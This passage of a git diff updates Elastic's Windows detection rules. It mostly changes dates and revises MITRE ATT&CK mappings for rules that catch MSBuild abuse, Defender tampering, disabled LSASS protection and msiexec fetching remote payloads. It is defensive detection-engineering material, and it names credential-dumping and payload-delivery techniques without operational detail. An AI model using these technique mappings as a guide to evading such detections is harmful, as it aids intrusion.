creation_date = "2020/10/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -138,14 +138,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml index 93810f62173..c5fd16c25f2 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,26 +119,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml index 078583b84ea..d9184a4ec77 100755 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,27 +87,40 @@ host.os.type:windows and event.category:process and event.type:start and ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -123,13 +136,15 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml index c2e91fd6574..08c29c23cbe 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,26 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml index ba363f8f52b..83083001b86 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,32 +88,49 @@ process.name:("csc.exe" or "iexplore.exe" or "powershell.exe") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml index e1eaae3f8de..4bc03f720d4 100644 --- a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml +++ b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/07" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Dennis Perto"] @@ -106,19 +106,33 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml index 628a39d0949..2adf52c0ccd 100644 --- a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml +++ b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,6 +85,17 @@ registry where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.013" +name = "Encrypted/Encoded File" +reference = "https://attack.mitre.org/techniques/T1027/013/" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -95,9 +106,7 @@ id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_iis_httplogging_disabled.toml b/rules/windows/defense_evasion_iis_httplogging_disabled.toml index 1f7de5422de..a8bf93c30d9 100644 --- a/rules/windows/defense_evasion_iis_httplogging_disabled.toml +++ b/rules/windows/defense_evasion_iis_httplogging_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,19 +89,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_indirect_exec_conhost.toml b/rules/windows/defense_evasion_indirect_exec_conhost.toml index 12330d28d1f..c429f557982 100644 --- a/rules/windows/defense_evasion_indirect_exec_conhost.toml +++ b/rules/windows/defense_evasion_indirect_exec_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,14 +80,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_indirect_exec_openssh.toml b/rules/windows/defense_evasion_indirect_exec_openssh.toml index 0e3563ddef1..886d3bde22c 100644 --- a/rules/windows/defense_evasion_indirect_exec_openssh.toml +++ b/rules/windows/defense_evasion_indirect_exec_openssh.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,14 +80,18 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml index 742f00543cf..eb5db75d1d3 100755 --- a/rules/windows/defense_evasion_injection_msbuild.toml +++ b/rules/windows/defense_evasion_injection_msbuild.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,6 +76,7 @@ process where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" @@ -85,27 +86,13 @@ reference = "https://attack.mitre.org/techniques/T1055/" id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml index bc19ee7efbd..760a67eeb77 100644 --- a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml +++ b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,14 +95,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml index 6f434c174de..666ad8bda1e 100644 --- a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml +++ b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,6 +92,7 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -101,14 +102,31 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml index 47bf071a3c6..00ea4e6edd4 100644 --- a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml +++ b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,19 +111,28 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_masquerading_renamed_autoit.toml b/rules/windows/defense_evasion_masquerading_renamed_autoit.toml index 182bab1599a..749e89527bc 100644 --- a/rules/windows/defense_evasion_masquerading_renamed_autoit.toml +++ b/rules/windows/defense_evasion_masquerading_renamed_autoit.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -128,19 +128,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.010" +name = "AutoHotKey & AutoIT" +reference = "https://attack.mitre.org/techniques/T1059/010/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml index f7808e814e3..7a8e2499e75 100644 --- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml +++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -97,48 +97,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.012" -name = "Image File Execution Options Injection" -reference = "https://attack.mitre.org/techniques/T1546/012/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_microsoft_defender_tampering.toml b/rules/windows/defense_evasion_microsoft_defender_tampering.toml index 2b7315a7978..7e8e3addb77 100644 --- a/rules/windows/defense_evasion_microsoft_defender_tampering.toml +++ b/rules/windows/defense_evasion_microsoft_defender_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -140,6 +140,7 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -150,9 +151,12 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_msbuild_making_network_connections.toml b/rules/windows/defense_evasion_msbuild_making_network_connections.toml index 5f9e895759c..0a7daa1afcf 100644 --- a/rules/windows/defense_evasion_msbuild_making_network_connections.toml +++ b/rules/windows/defense_evasion_msbuild_making_network_connections.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -146,19 +146,31 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/defense_evasion_mshta_susp_child.toml b/rules/windows/defense_evasion_mshta_susp_child.toml index 2d5a06f7b7f..bbf270aa628 100644 --- a/rules/windows/defense_evasion_mshta_susp_child.toml +++ b/rules/windows/defense_evasion_mshta_susp_child.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -93,19 +93,51 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_msiexec_remote_payload.toml b/rules/windows/defense_evasion_msiexec_remote_payload.toml index ba656ec2c14..7d424238572 100644 --- a/rules/windows/defense_evasion_msiexec_remote_payload.toml +++ b/rules/windows/defense_evasion_msiexec_remote_payload.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,19 +92,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/defense_evasion_msxsl_network.toml b/rules/windows/defense_evasion_msxsl_network.toml index b4eaa6909a3..04e635393b9 100644 --- a/rules/windows/defense_evasion_msxsl_network.toml +++ b/rules/windows/defense_evasion_msxsl_network.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,14 +85,26 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml index 1d239873113..8bd8d22974b 100644 --- a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +++ b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -166,34 +166,73 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1127" name = "Trusted 